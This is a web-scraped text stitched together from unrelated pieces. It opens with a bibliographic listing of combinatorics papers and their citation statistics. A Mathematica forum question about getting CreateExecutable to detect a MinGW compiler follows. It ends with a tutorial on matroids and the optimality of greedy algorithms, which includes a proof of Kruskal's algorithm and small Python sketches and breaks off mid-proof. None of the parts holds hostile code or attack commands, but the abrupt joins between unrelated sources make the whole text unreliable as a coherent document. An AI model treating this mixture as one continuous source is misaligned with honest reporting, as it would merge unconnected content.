The rigidity of periodic frameworks as graphs on a fixed torus. Zbl 1317.52028
Ross, Elissa
2014
Interlacement in 4-regular graphs: a new approach using nonsymmetric matrices. Zbl 1317.05092
Traldi, Lorenzo
2014
An inductive construction of $$(2,1)$$-tight graphs. Zbl 1317.52027
Nixon, Anthony; Owen, John C.
2014
A short construction of highly chromatic digraphs without short cycles. Zbl 1317.05079
Severino, Michael
2014
Kneser-Poulsen conjecture for a small number of intersections. Zbl 1317.52004
Gorbovickis, Igors
2014
A short note on integer complexity. Zbl 1371.37010
Steinerberger, Stefan
2014
The copnumber for lexicographic products and sums of graphs. Zbl 1317.05123
Schröder, Bernd S. W.
2014
An improved bound on the number of point-surface incidences in three dimensions. Zbl 1317.52022
Zahl, Joshua
2013
Elements of finite order in automorphism groups of homogeneous structures. Zbl 1321.20003
Bilge, Doǧan; Melleray, Julien
2013
Quasi-Hermitian varieties in $$PG(r,q^2)$$, $$q$$ even. Zbl 1317.51005
Aguglia, Angela
2013
The exact maximal energy of integral circulant graphs with prime power order. Zbl 1317.05114
Sander, Jürgen W.; Sander, Torsten
2013
$$2L$$ convex polyominoes: discrete tomographical aspects. Zbl 1317.52034
Tawbe, Khalil; Vuillon, Laurent
2013
Translation planes of order $$23^2$$. Zbl 1317.51001
Abatangelo, Vito; Emma, Daniela; Larato, Bambina
2013
The Erdős-Ko-Rado basis for a Leonard system. Zbl 1317.05185
Tanaka, Hajime
2013
Cycles, wheels, and gears in finite planes. Zbl 1317.05126
Peabody, Jamie; Vega, Oscar; White, Jordan
2013
Algorithms for classifying regular polytopes with a fixed automorphism group. Zbl 1317.51019
Leemans, Dimitri; Mixer, Mark
2012
On characterizing game-perfect graphs by forbidden induced subgraphs. Zbl 1317.05045
Andres, Stephan Dominique
2012
2-generated Cayley digraphs on nilpotent groups have Hamiltonian paths. Zbl 1317.05074
Morris, Dave Witte
2012
Decoding generalised hyperoctahedral groups and asymptotic analysis of correctible error patterns. Zbl 1317.94157
Bailey, Robert F.; Prellberg, Thomas
2012
Complementaries to Kummer’s degree seven reciprocity law and a Dickson Diophantine system. Zbl 1317.11008
Caranay, Perlas
2012
Domination value in graphs. Zbl 1317.05144
Yi, Eunjeong
2012
Distinguishing homomorphisms of infinite graphs. Zbl 1317.05047
Bonato, Anthony; Delić, Dejan
2012
Frobenius partition theoretic interpretations of some basic series identities. Zbl 1317.05014
Sood, Garima; Agarwal, Ashok K.
2012
Some rigid moieties of homogeneous graphs. Zbl 1317.05189
Bilge, Doǧan; Jaligot, Eric
2012
A discrete Faà di Bruno’s formula. Zbl 1317.26013
Duarte, Pedro; Torres, Maria Joana
2012
Claw-freeness, 3-homogeneous subsets of a graph and a reconstruction problem. Zbl 1317.05127
Pouzet, Maurice; Kaddour, Hamza Si; Trotignon, Nicolas
2011
Partially critical tournaments and partially critical supports. Zbl 1318.05031
Sayar, Mohamed Y.
2011
Cones of partial metrics. Zbl 1323.51004
Deza, Michel; Deza, Elena
2011
A bijection between noncrossing and nonnesting partitions of types A, B and C. Zbl 1317.05022
Mamede, Ricardo
2011
Option-closed games. Zbl 1367.91043
Nowakowski, Richard J.; Ottaway, Paul
2011
Strong $$d$$-collapsibility. Zbl 1317.05198
Tancer, Martin
2011
On a generalization of the Blaschke-Lebesgue theorem for disk-polygons. Zbl 1321.52002
Bezdek, Máté
2011
Dual linear spaces generated by a non-Desarguesian configuration. Zbl 1327.51011
Nation, James B.; Seffrood, Jiajia Y. G.
2011
A variant of the bipartite relation theorem and its application to clique graphs. Zbl 1317.05038
Kawamura, Kazuhiro
2011
A graph theoretic proof of the complexity of colouring by a local tournament with at least two directed cycles. Zbl 1317.05069
Bang-Jensen, Jørgen; MacGillivray, Gary; Swarts, Jacobus
2011
Freiman’s theorem for solvable groups. Zbl 1332.11015
Tao, Terence
2010
Polytopes derived from sporadic simple groups. Zbl 1320.51021
Hartley, Michael Ian; Hulpke, Alexander
2010
...and 51 more Documents
#### Cited by 780 Authors
19 Qi, Feng 12 Bonato, Anthony 11 Golovach, Petr A. 11 Paulusma, Daniël 11 Schulze, Bernd 10 Leemans, Dimitri 9 Guo, Bai-Ni 9 Tao, Terence 8 Marcugini, Stefano 8 Pambianco, Fernanda 7 Bartoli, Daniele 7 Davydov, Alexander A. 7 Faina, Giorgio 7 Sheffer, Adam 6 Araujo-Pardo, Gabriela 6 Balbuena, Camino 6 Ille, Pierre 6 Lozin, Vadim Vladislavovich 6 Malyshev, Dmitry S. 6 Pham Van Thang 6 Song, Jian 6 Vinh, Le Anh 6 Ziegler, Tamar 5 Alfakih, Abdo Y. 5 Boudabbous, Imed 5 Chudnovsky, Maria 5 Green, Ben Joseph 5 Lim, Dongkyu 5 Mc Inerney, Fionn 5 Prałat, Paweł 5 Schaudt, Oliver 5 Sharir, Micha 5 Traldi, Lorenzo 5 Whiteley, Walter John 4 Adamaszek, Michal 4 Belkhechine, Houmem 4 Dammak, Jamel 4 De Bruyn, Bart 4 Goyal, Megha 4 Helfgott, Harald Andrés 4 Messinger, Margaret-Ellen 4 Pavese, Francesco 4 Ries, Bernard 4 Sanders, Tom 4 Si-Kaddour, Hamza 4 Tanigawa, Shin-ichi 4 Yang, Boting 4 Zahl, Joshua 4 Zhong, Mingxian 3 Abreu, Marién 3 Adams, Henry 3 Aguglia, Angela 3 Basu, Saugata 3 Bishnoi, Anurag 3 Boudabbous, Youssef 3 Boussairi, Abderrahim 3 Breuillard, Emmanuel 3 Brijder, Robert 3 Chergui, Brahim 3 Cichacz, Sylwia 3 Clarke, Nancy Ellen 3 Couturier, Jean-Francois 3 Csajbók, Bence 3 Cunningham, Gabe 3 Dabrowski, Konrad Kazimierz 3 Deza, Elena Ivanovna 3 Fernandes, Maria Elisa 3 Giulietti, Massimo 3 Goedgebeur, Jan 3 Hahn, Gena 3 Ham, Le Quang 3 Héger, Tamás 3 Kazhdan, David A. 3 Koh, Doowon 3 Korchmáros, Gábor 3 Kratsch, Dieter 3 Labbate, Domenico 3 Lovett, Shachar 3 Milanič, Martin 3 Mixer, Mark 3 Mojarrad, Hossein Nassajian 3 Nixon, Anthony 3 Nowakowski, Richard J. 3 Roche-Newton, Oliver 3 Ross, Elissa 3 Slomka, Boaz A. 3 Solomon, Noam 3 Sopena, Éric 3 Stein, Maya Jakobine 3 Valculescu, Claudiu 2 Alzohairi, Mohammad 2 Andres, Stephan Dominique 2 Anholcer, Marcin 2 Artstein-Avidan, Shiri 2 Austin, Tim D. 2 Bang-Jensen, Jørgen 2 Bannai, Eiichi 2 Ben Salha, Cherifa 2 Bonamy, Marthe 2 Bonomo-Braberman, Flavia ...and 680 more Authors
#### Cited in 162 Journals
42 Discrete Mathematics 24 European Journal of Combinatorics 23 Discrete Applied Mathematics 21 Theoretical Computer Science 21 The Electronic Journal of Combinatorics 19 Discrete & Computational Geometry 16 Graphs and Combinatorics 12 Geometric and Functional Analysis. GAFA 7 Journal of Geometry 6 Journal of Combinatorial Theory. Series A 6 Algorithmica 6 SIAM Journal on Discrete Mathematics 6 Designs, Codes and Cryptography 6 Linear Algebra and its Applications 6 Journal of Algebraic Combinatorics 6 Discrete Analysis 5 Israel Journal of Mathematics 5 Advances in Mathematics 5 Transactions of the American Mathematical Society 5 Combinatorica 5 Integers 5 Comptes Rendus. Mathématique. Académie des Sciences, Paris 5 Contributions to Discrete Mathematics 4 Journal of Combinatorial Theory. Series B 4 Journal of Graph Theory 4 Journal of Number Theory 4 Proceedings of the American Mathematical Society 4 The Ramanujan Journal 4 Journal of Combinatorial Optimization 4 Annals of Combinatorics 4 Ars Mathematica Contemporanea 3 Bulletin of the Australian Mathematical Society 3 International Journal of Solids and Structures 3 Journal d’Analyse Mathématique 3 Problems of Information Transmission 3 Geometriae Dedicata 3 Journal of Algebra 3 Mathematika 3 Bulletin of the Korean Mathematical Society 3 Proceedings of the Indian Academy of Sciences. Mathematical Sciences 3 The Australasian Journal of Combinatorics 3 Combinatorics, Probability and Computing 3 Finite Fields and their Applications 3 Discussiones Mathematicae. Graph Theory 3 Journal of Integer Sequences 3 Journal of the European Mathematical Society (JEMS) 3 Bulletin of the Malaysian Mathematical Sciences Society. 
Second Series 3 Mediterranean Journal of Mathematics 3 Optimization Letters 2 Information Processing Letters 2 Journal of Mathematical Analysis and Applications 2 Mathematical Notes 2 Rocky Mountain Journal of Mathematics 2 Beiträge zur Algebra und Geometrie 2 Acta Arithmetica 2 Applied Mathematics and Computation 2 Publications Mathématiques 2 International Journal of Game Theory 2 Inventiones Mathematicae 2 Mathematische Annalen 2 Advances in Applied Mathematics 2 Acta Mathematica Hungarica 2 Order 2 Journal of Symbolic Computation 2 Forum Mathematicum 2 Computational Geometry 2 Aequationes Mathematicae 2 Bulletin of the American Mathematical Society. New Series 2 Archive for Mathematical Logic 2 Mathematical Programming. Series A. Series B 2 Indagationes Mathematicae. New Series 2 Journal of Combinatorial Designs 2 Selecta Mathematica. New Series 2 Opuscula Mathematica 2 ELA. The Electronic Journal of Linear Algebra 2 Portugaliae Mathematica. Nova Série 2 Journal of Multiple-Valued Logic and Soft Computing 2 AKCE International Journal of Graphs and Combinatorics 2 Discrete Optimization 2 Chebyshevskiĭ Sbornik 2 Applicable Analysis and Discrete Mathematics 2 Discrete Mathematics, Algorithms and Applications 2 Acta Universitatis Sapientiae. Mathematica 2 International Journal of Combinatorics 2 Dynamic Games and Applications 2 Iranian Journal of Mathematical Sciences and Informatics 2 Mathematics 2 Korean Journal of Mathematics 1 Linear and Multilinear Algebra 1 Mathematical Proceedings of the Cambridge Philosophical Society 1 Periodica Mathematica Hungarica 1 Ukrainian Mathematical Journal 1 ACM Transactions on Mathematical Software 1 Algebra Universalis 1 Annals of the Institute of Statistical Mathematics 1 Demonstratio Mathematica 1 Duke Mathematical Journal 1 Journal of Computational and Applied Mathematics 1 Journal of Functional Analysis 1 Journal of Pure and Applied Algebra ...and 62 more Journals
#### Cited in 43 Fields
311 Combinatorics (05-XX) 109 Number theory (11-XX) 81 Convex and discrete geometry (52-XX) 60 Geometry (51-XX) 60 Computer science (68-XX) 39 Group theory and generalizations (20-XX) 39 Game theory, economics, finance, and other social and behavioral sciences (91-XX) 19 Mathematical logic and foundations (03-XX) 18 Information and communication theory, circuits (94-XX) 16 Linear and multilinear algebra; matrix theory (15-XX) 14 Order, lattices, ordered algebraic structures (06-XX) 14 Operations research, mathematical programming (90-XX) 13 Probability theory and stochastic processes (60-XX) 11 Algebraic geometry (14-XX) 11 Special functions (33-XX) 9 Functional analysis (46-XX) 8 Commutative algebra (13-XX) 7 Manifolds and cell complexes (57-XX) 6 Field theory and polynomials (12-XX) 6 Dynamical systems and ergodic theory (37-XX) 6 Algebraic topology (55-XX) 5 Topological groups, Lie groups (22-XX) 5 Ordinary differential equations (34-XX) 5 General topology (54-XX) 4 Real functions (26-XX) 4 Functions of a complex variable (30-XX) 3 Measure and integration (28-XX) 3 Mechanics of particles and systems (70-XX) 3 Mechanics of deformable solids (74-XX) 2 Category theory; homological algebra (18-XX) 2 Potential theory (31-XX) 2 Abstract harmonic analysis (43-XX) 2 Integral transforms, operational calculus (44-XX) 2 Statistics (62-XX) 2 Biology and other natural sciences (92-XX) 1 Associative rings and algebras (16-XX) 1 Nonassociative rings and algebras (17-XX) 1 Several complex variables and analytic spaces (32-XX) 1 Approximations and expansions (41-XX) 1 Differential geometry (53-XX) 1 Numerical analysis (65-XX) 1 Statistical mechanics, structure of matter (82-XX) 1 Mathematics education (97-XX)
# C compiler options passed by Mathematica
What options can be used for compilation using Compile or CreateExecutable in Mathematica and where can one find details on the possible values for the settings?
I have a recent build of MinGW installed on a Win7 workstation which works when called from the command line, but it isn't detected by Mathematica. The following should let Mathematica know where to find the compiler:
Needs["CCompilerDriver`GenericCCompiler`"]
$CCompiler = {"Compiler" -> GenericCCompiler,
   "CompilerInstallation" -> "C:\\Program Files\\mingw-builds\\x64-4.8.1-posix-seh-rev5\\mingw64\\bin",
   "CompilerName" -> "x86_64-w64-mingw32-gcc.exe",
   "CompileOptions" -> "-O2"};

Why does the following test code (from the specific compilers help) fail to compile? I assume Mathematica is still not recognizing the C compiler, but it's not clear why.

In[1]:= greeter = CreateExecutable[StringJoin[
   "#include<stdio.h>\n",
   "int main(){\n",
   "  printf(\"Hello MinGW-w64 world.\\n\");\n",
   "}\n"], "hiworld",
  "Compiler" -> GenericCCompiler,
  "CompilerInstallation" -> "C:\\Program Files\\mingw-builds\\x64-4.8.1-posix-seh-rev5\\mingw64\\bin",
  "CompilerName" -> "x86_64-w64-mingw32-gcc.exe"]

Out[1]= $Failed
Setting "Debug" -> True for CreateExecutable gives us some additional output:
In[2]:= greeter = (*same as above, with "Debug"->True*)
Out[2]= $Failed The -L (libraries path) and -I (include path) options shown in the output are mentioned briefly in the gcc docs and in this answer by @Szabolcs. • Does $CCompiler = {"Compiler" -> CCompilerDriverMinGWCompilerMinGWCompiler, "CompilerInstallation" -> "C:\\Program Files\\mingw-builds\\x64-4.8.1-posix-seh-rev5\\mingw64\\bin", "CompilerName" -> Automatic}; help? – xzczd Oct 9 '14 at 7:15
• @xzczd Do you have MinGWCompiler defined on your system? When I try with that setting I get the CreateExecutable::badcomp error message, which states: Compiler specification "Compiler"->CCompilerDriver`MinGWCompiler`MinGWCompiler does not specify a compiler driver listed by CCompilers[Full]. – dionys Oct 9 '14 at 8:21
• I have TDM-GCC installed in my computer. What's the output if you run CCompilers[Full]? – xzczd Oct 9 '14 at 8:25
• @xzczd With a fresh kernel after calling Needs["CCompilerDriver`"]; Needs["CCompilerDriver`GenericCCompiler`"];, CCompilers[Full] returns {{Name->Intel Compiler,Compiler->CCompilerDriver`IntelCompiler`IntelCompiler,CompilerInstallation->None,CompilerName->Automatic},{Name->Generic C Compiler,Compiler->GenericCCompiler,CompilerInstallation->None,CompilerName->Automatic}} – dionys Oct 9 '14 at 8:44
# When Greedy Algorithms are Perfect: the Matroid
Greedy algorithms are by far one of the easiest and most well-understood algorithmic techniques. There is a wealth of variations, but at its core the greedy algorithm optimizes something using the natural rule, “pick what looks best” at any step. So a greedy routing algorithm would say to a routing problem: “You want to visit all these locations with minimum travel time? Let’s start by going to the closest one. And from there to the next closest one. And so on.”
Because greedy algorithms are so simple, researchers have naturally made a big effort to understand their performance. Under what conditions will they actually solve the problem we’re trying to solve, or at least get close? In a previous post we gave some easy-to-state conditions under which greedy gives a good approximation, but the obvious question remains: can we characterize when greedy algorithms give an optimal solution to a problem?
The answer is yes, and the framework that enables us to do this is called a matroid. That is, if we can phrase the problem we’re trying to solve as a matroid, then the greedy algorithm is guaranteed to be optimal. Let’s start with an example when greedy is provably optimal: the minimum spanning tree problem. Throughout the article we’ll assume the reader is familiar with the very basics of linear algebra and graph theory (though we’ll remind ourselves what a minimum spanning tree is shortly). For a refresher, this blog has primers on both subjects. But first, some history.
## History
Matroids were first introduced by Hassler Whitney in 1935, and independently discovered a little later by B.L. van der Waerden (a big name in combinatorics). They were both interested in devising a general description of “independence,” the properties of which are strikingly similar when specified in linear algebra and graph theory. Since then the study of matroids has blossomed into a large and beautiful theory, one part of which is the characterization of the greedy algorithm: greedy is optimal on a problem if and only if the problem can be represented as a matroid. Mathematicians have also characterized which matroids can be modeled as spanning trees of graphs (we will see this momentarily). As such, matroids have become a standard topic in the theory and practice of algorithms.
## Minimum Spanning Trees
It is often natural in an undirected graph $G = (V,E)$ to find a connected subset of edges that touch every vertex. As an example, if you’re working on a power network you might want to identify a “backbone” of the network so that you can use the backbone to cheaply travel from any node to any other node. Similarly, in a routing network (like the internet) it costs a lot of money to lay down cable, so it’s in the interest of the internet service providers to design analogous backbones into their infrastructure.
A minimal subset of edges in a backbone like this is guaranteed to form a tree. This is simply because if you have a cycle in your subgraph then removing any edge on that cycle doesn’t break connectivity or the fact that you can get from any vertex to any other (and trees are the maximal subgraphs without cycles). As such, these “backbones” are called spanning trees. “Span” here means that you can get from any vertex to any other vertex; it also suggests the connection to linear algebra that we’ll describe later. A simple property of a tree is that there is a unique path between any two vertices in the tree.
An example of a spanning tree
When your edges $e \in E$ have nonnegative weights $w_e \in \mathbb{R}^{\geq 0}$, we can further ask to find a minimum cost spanning tree. The cost of a spanning tree $T$ is just the sum of its edges, and it’s important enough of a definition to offset.
Definition: A minimum spanning tree $T$ of a weighted graph $G$ (with weights $w_e \geq 0$ for $e \in E$) is a spanning tree which minimizes the quantity
$w(T) = \sum_{e \in T} w_e$
There are a lot of algorithms to find minimal spanning trees, but one that will lead us to matroids is Kruskal’s algorithm. It’s quite simple. We’ll maintain a forest $F$ in $G$, which is just a subgraph consisting of a bunch of trees that may or may not be connected. At the beginning $F$ is just all the vertices with no edges. And then at each step we add to $F$ the edge $e$ whose weight is smallest and also does not introduce any cycles into $F$. If the input graph $G$ is connected then this will always produce a minimal spanning tree.
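Kruskal’s algorithm as described above can be sketched in a few lines of Python. This is a minimal illustration, not a tuned implementation; the union-find structure is the standard trick for the “does adding this edge create a cycle?” test, and the example graph at the bottom is made up.

```python
# A minimal sketch of Kruskal's algorithm with union-find: sort edges by
# weight, and add an edge whenever it joins two different trees of the
# current forest F.

def kruskal(n, edges):
    """n: number of vertices (labeled 0..n-1); edges: list of (weight, u, v)."""
    parent = list(range(n))

    def find(x):  # root of x's tree, with path compression
        while parent[x] != x:
            parent[x] = parent[parent[x]]
            x = parent[x]
        return x

    forest = []
    for w, u, v in sorted(edges):
        ru, rv = find(u), find(v)
        if ru != rv:          # adding (u, v) introduces no cycle
            parent[ru] = rv
            forest.append((w, u, v))
    return forest

# Example: a path 0-1-2-3 plus a heavy chord (0, 2); the chord is skipped.
tree = kruskal(4, [(1, 0, 1), (2, 1, 2), (3, 2, 3), (10, 0, 2)])
```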
Theorem: Kruskal’s algorithm produces a minimal spanning tree of a connected graph.
Proof. Call $F_t$ the forest produced at step $t$ of the algorithm. Then $F_0$ is the set of all vertices of $G$ and $F_{n-1}$ is the final forest output by Kruskal’s (as a quick exercise, prove all spanning trees on $n$ vertices have $n-1$ edges, so we will stop after $n-1$ rounds). It’s clear that $F_{n-1}$ is a tree because the algorithm guarantees no $F_i$ will have a cycle. And any tree with $n-1$ edges is necessarily a spanning tree, because if some vertex were left out then there would be $n-1$ edges on a subgraph of $n-1$ vertices, necessarily causing a cycle somewhere in that subgraph.
Now we’ll prove that $F_{n-1}$ has minimal cost. We’ll prove this in a similar manner to the general proof for matroids. Indeed, say you had a tree $T$ whose cost is strictly less than that of $F_{n-1}$ (we can also suppose that $T$ is minimal, but this is not necessary). Pick the minimal weight edge $e \in T$ that is not in $F_{n-1}$. Adding $e$ to $F_{n-1}$ introduces a unique cycle $C$ in $F_{n-1}$. This cycle has some useful properties. First, $e$ has the highest cost of any edge on $C$, for otherwise Kruskal’s algorithm would have chosen it before the heavier-weight edges. Second, there is another edge in $C$ that’s not in $T$ (because $T$ is a tree it can’t contain the entire cycle). Call such an edge $e'$. Now we can remove $e'$ from $F_{n-1}$ and add $e$. Since $w(e) \geq w(e')$, this swap cannot decrease the total cost of $F_{n-1}$, and it produces a tree with one more edge in common with $T$ than before. Repeating the process we described would eventually transform $F_{n-1}$ into $T$ exactly, while never decreasing the total cost, contradicting that $T$ had strictly lower weight than $F_{n-1}$.
$\square$
Just to recap, we defined sets of edges to be “good” if they did not contain a cycle, and a spanning tree is a maximal set of edges with this property. In this scenario, the greedy algorithm performed optimally at finding a spanning tree with minimal total cost.
## Columns of Matrices
Now let’s consider a different kind of problem. Say I give you a matrix like this one:
$\displaystyle A = \begin{pmatrix} 2 & 0 & 1 & -1 & 0 \\ 0 & -4 & 0 & 1 & 0 \\ 0 & 0 & 1 & 0 & 7 \end{pmatrix}$
In the standard interpretation of linear algebra, this matrix represents a linear function $f$ from one vector space $V$ to another $W$, with the basis $(v_1, \dots, v_5)$ of $V$ being represented by columns and the basis $(w_1, w_2, w_3)$ of $W$ being represented by the rows. Column $j$ tells you how to write $f(v_j)$ as a linear combination of the $w_i$, and in so doing uniquely defines $f$.
Now one thing we want to calculate is the rank of this matrix. That is, what is the dimension of the image of $V$ under $f$? By linear algebraic arguments we know that this is equivalent to asking “how many linearly independent columns of $A$ can we find”? An interesting consequence is that if you have two sets of columns that are both linearly independent and maximally so (adding any other column to either set would necessarily introduce a dependence in that set), then these two sets have the same size. This is part of why the rank of a matrix is well-defined.
If we were to give the columns of $A$ costs, then we could ask about finding the minimal-cost maximally-independent column set. It sounds like a mouthful, but it’s exactly the same idea as with spanning trees: we want a set of vectors that spans the whole column space of $A$, but contains no “cycles” (linearly dependent combinations), and we want the cheapest such set.
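This greedy can be sketched directly. In this small illustration the costs are made up, and linear independence is tested by exact Gaussian elimination over the rationals (via `Fraction`) rather than floating point; the columns are those of the matrix $A$ above.

```python
# Greedy for the column problem: repeatedly add the cheapest column that
# keeps the chosen set linearly independent.

from fractions import Fraction

def independent(vectors):
    """True if the given list of vectors is linearly independent."""
    rows = [[Fraction(x) for x in v] for v in vectors]
    rank = 0
    for col in range(len(rows[0]) if rows else 0):
        pivot = next((r for r in range(rank, len(rows)) if rows[r][col]), None)
        if pivot is None:
            continue
        rows[rank], rows[pivot] = rows[pivot], rows[rank]
        for r in range(len(rows)):
            if r != rank and rows[r][col]:
                f = rows[r][col] / rows[rank][col]
                rows[r] = [a - f * b for a, b in zip(rows[r], rows[rank])]
        rank += 1
    return rank == len(rows)

def greedy_min_cost_basis(columns, costs):
    chosen = []  # list of (cost, column), cheapest first
    for c, col in sorted(zip(costs, columns)):
        if independent([v for _, v in chosen] + [col]):
            chosen.append((c, col))
    return chosen

# The five columns of the matrix A above, with made-up costs.
cols = [(2, 0, 0), (0, -4, 0), (1, 0, 1), (-1, 1, 0), (0, 0, 7)]
basis = greedy_min_cost_basis(cols, [5, 1, 2, 4, 3])
```

The greedy picks the three cheapest columns that remain independent, and stops once it has spanned the column space.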
So we have two kinds of “independence systems” that seem to be related. One interesting question we can ask is whether these kinds of independence systems are “the same” in a reasonable way. Hardcore readers of this blog may see the connection quite quickly. For any graph $G = (V,E)$, there is a natural linear map from $E$ to $V$, so that a linear dependence among the columns (edges) corresponds to a cycle in $G$. This map is called the incidence matrix by combinatorialists and the first boundary map by topologists.
The map is easy to construct: for each edge $e = (v_i,v_j)$ you add a column with a $1$ in the $j$-th row and a $-1$ in the $i$-th row. Then a sum of edge columns (with signs chosen to orient the edges consistently) gives you zero if and only if the edges form a cycle. So we can think of a set of edges as “independent” if they don’t contain a cycle. It’s a little bit less general than independence over $\mathbb{R}$, but you can make it exactly the same kind of independence if you change your field from the real numbers to $\mathbb{Z}/2\mathbb{Z}$. We won’t do this because it would detract from our end goal (to analyze greedy algorithms in realistic settings), but for further reading this survey of Oxley assumes that perspective.
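Here is a tiny sketch of that construction (the triangle example and vertex labels are ours): each edge becomes a signed column, and summing the columns of a cycle’s edges, oriented consistently, gives the zero vector.

```python
# Incidence-matrix columns: edge (v_i, v_j) becomes a column with -1 in
# row i and +1 in row j. Cycles are exactly the linear dependencies.

def incidence_column(n, i, j):
    col = [0] * n
    col[i], col[j] = -1, 1
    return col

# Triangle on vertices 0, 1, 2, traversed consistently: (0,1), (1,2), (2,0).
n = 3
cycle = [incidence_column(n, 0, 1),
         incidence_column(n, 1, 2),
         incidence_column(n, 2, 0)]

# Summing the three columns row by row yields the zero vector.
total = [sum(c[r] for c in cycle) for r in range(n)]
```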
So with the recognition of how similar these notions of independence are, we are ready to define matroids.
## The Matroid
So far we’ve seen two kinds of independence: “sets of edges with no cycles” (also called forests) and “sets of linearly independent vectors.” Both of these share two trivial properties: there are always nonempty independent sets, and every subset of an independent set is independent. We will call any family of subsets with this property an independence system.
Definition: Let $X$ be a finite set. An independence system over $X$ is a family $\mathscr{I}$ of subsets of $X$ with the following two properties.
1. $\mathscr{I}$ is nonempty.
2. If $I \in \mathscr{I}$, then so is every subset of $I$.
This is too general to characterize greedy algorithms, so we need one more property shared by our examples. There are a few candidates we could use, but here's one nice property that turns out to be enough.
Definition: A matroid $M = (X, \mathscr{I})$ is a set $X$ and an independence system $\mathscr{I}$ over $X$ with the following property:
If $A, B$ are in $\mathscr{I}$ with $|A| = |B| + 1$, then there is an element $a \in A \setminus B$ such that $B \cup \{ a \} \in \mathscr{I}$.
In other words, this property says if I have an independent set that is not maximally independent, I can grow the set by adding some suitably-chosen element from a larger independent set. We’ll call this the extension property. For a warmup exercise, let’s prove that the extension property is equivalent to the following (assuming the other properties of a matroid):
For every subset $Y \subset X$, all maximal independent sets contained in $Y$ have equal size.
Proof. For one direction, if you have two maximal sets $A, B \subset Y \subset X$ that are not the same size (say $A$ is bigger), then you can take any subset of $A$ whose size is exactly $|B| + 1$, and use the extension property to make $B$ larger, a contradiction. For the other direction, say that I know all maximal independent sets of any $Y \subset X$ have the same size, and you give me $A, B \subset X$ with $|A| = |B| + 1$. I need to find an $a \in A \setminus B$ that I can add to $B$ and keep it independent. What I do is take the subset $Y = A \cup B$. Now the sizes of $A, B$ don’t change, but $B$ can’t be maximal inside $Y$ because it’s smaller than $A$ ($A$ might not be maximal either, but it’s still independent). And the only way to extend $B$ inside $Y$ is by adding something from $A \setminus B$, as desired.
$\square$
So we can use the extension property and the cardinality property interchangeably when talking about matroids. Continuing to connect matroid language to linear algebra and graph theory, the maximal independent sets of a matroid are called bases, the size of any basis is the rank of the matroid, and the minimal dependent sets are called circuits. In fact, you can characterize matroids in terms of the properties of their circuits, which are dual to the properties of bases (and hence all independent sets) in a very concrete sense.
But while you could spend all day characterizing the many kinds of matroids and comatroids out there, we are still faced with the task of seeing how the greedy algorithm performs on a matroid. That is, suppose that your matroid $M = (X, \mathscr{I})$ has a nonnegative real number $w(x)$ associated with each $x \in X$. And suppose we had a black-box function to determine if a given set $S \subset X$ is independent. Then the greedy algorithm maintains a set $B$, and at every step adds a minimum weight element that maintains the independence of $B$. If we measure the cost of a subset by the sum of the weights of its elements, then the question is whether the greedy algorithm finds a minimum weight basis of the matroid.
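Before answering, here's a sketch of the greedy algorithm in Python, with the black-box oracle passed in as a plain function (the names and the union-find example are my own choices, not a fixed API). Plugging in "forests in a graph" as the independence system recovers Kruskal's minimum spanning tree algorithm:

```python
def greedy_min_basis(ground_set, weight, is_independent):
    """Grow a set greedily, cheapest element first, keeping independence."""
    basis = []
    for x in sorted(ground_set, key=weight):
        if is_independent(basis + [x]):
            basis.append(x)
    return basis

def forms_forest(edges):
    """Oracle for the graphic matroid: is this edge set acyclic?"""
    parent = {}
    def find(v):
        parent.setdefault(v, v)
        while parent[v] != v:
            parent[v] = parent[parent[v]]  # path halving
            v = parent[v]
        return v
    for u, v in edges:
        ru, rv = find(u), find(v)
        if ru == rv:
            return False  # this edge would close a cycle
        parent[ru] = rv
    return True

weights = {(0, 1): 1, (1, 2): 2, (0, 2): 3, (2, 3): 1}
tree = greedy_min_basis(list(weights), weights.get, forms_forest)
print(sorted(tree))  # a minimum spanning tree: [(0, 1), (1, 2), (2, 3)]
```

Note the oracle is re-run from scratch on every candidate set; a real implementation would maintain the union-find incrementally, but the sketch keeps the black-box interface of the theorem.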
The answer is even better than yes. In fact, the answer is that the greedy algorithm performs perfectly if and only if the problem is a matroid! More rigorously,
Theorem: Suppose that $M = (X, \mathscr{I})$ is an independence system, and that we have a black-box algorithm to determine whether a given set is independent. Define the greedy algorithm as the one that iteratively adds the cheapest element of $X$ that maintains independence. Then the greedy algorithm produces a maximally independent set $S$ of minimal cost for every nonnegative cost function on $X$, if and only if $M$ is a matroid.
It’s clear that the algorithm will produce a set that is maximally independent. The only question is whether what it produces has minimum weight among all maximally independent sets. We’ll break the theorem into the two directions of the “if and only if”:
Part 1: If $M$ is a matroid, then greedy works perfectly no matter the cost function.
Part 2: If greedy works perfectly for every cost function, then $M$ is a matroid.
Proof of Part 1.
Call the cost function $w : X \to \mathbb{R}^{\geq 0}$, and suppose that the greedy algorithm picks elements $B = \{ x_1, x_2, \dots, x_r \}$ (in that order). It’s easy to see that $w(x_1) \leq w(x_2) \leq \dots \leq w(x_r)$. Now if you give me any list of $r$ independent elements $y_1, y_2, \dots, y_r \in X$ that has $w(y_1) \leq \dots \leq w(y_r)$, I claim that $w(x_i) \leq w(y_i)$ for all $i$. This proves what we want, because if there were a basis of size $r$ with smaller weight, sorting its elements by weight would give a list contradicting this claim.
To prove the claim, suppose to the contrary that it were false, and for some $k$ we have $w(x_k) > w(y_k)$. Moreover, pick the smallest $k$ for which this is true. Note $k > 1$, and so we can look at the special sets $S = \{ x_1, \dots, x_{k-1} \}$ and $T = \{ y_1, \dots, y_k \}$. Now $|T| = |S|+1$, so by the matroid property there is some $j$ between $1$ and $k$ so that $S \cup \{ y_j \}$ is an independent set (and $y_j$ is not in $S$). But then $w(y_j) \leq w(y_k) < w(x_k)$, and so the greedy algorithm would have picked $y_j$ before it picks $x_k$ (and the strict inequality means they’re different elements). This contradicts how the greedy algorithm runs, and hence proves the claim.
Proof of Part 2.
We’ll prove this contrapositively as follows. Suppose we have our independence system and it doesn’t satisfy the last matroid condition. Then we’ll construct a special weight function that causes the greedy algorithm to fail. So let $A,B$ be independent sets with $|A| = |B| + 1$, but for every $a \in A \setminus B$ adding $a$ to $B$ never gives you an independent set.
Now what we’ll do is define our weight function so that the greedy algorithm picks the elements we want in the order we want (roughly). In particular, we’ll assign all elements of $A \cap B$ a tiny weight we’ll call $w_1$. For elements of $B - A$ we’ll use $w_2$, and for $A - B$ we’ll use $w_3$, with $w_4$ for everything else. In a more compact notation:

$\displaystyle w(x) = \begin{cases} w_1 & \textup{if } x \in A \cap B \\ w_2 & \textup{if } x \in B - A \\ w_3 & \textup{if } x \in A - B \\ w_4 & \textup{otherwise} \end{cases}$
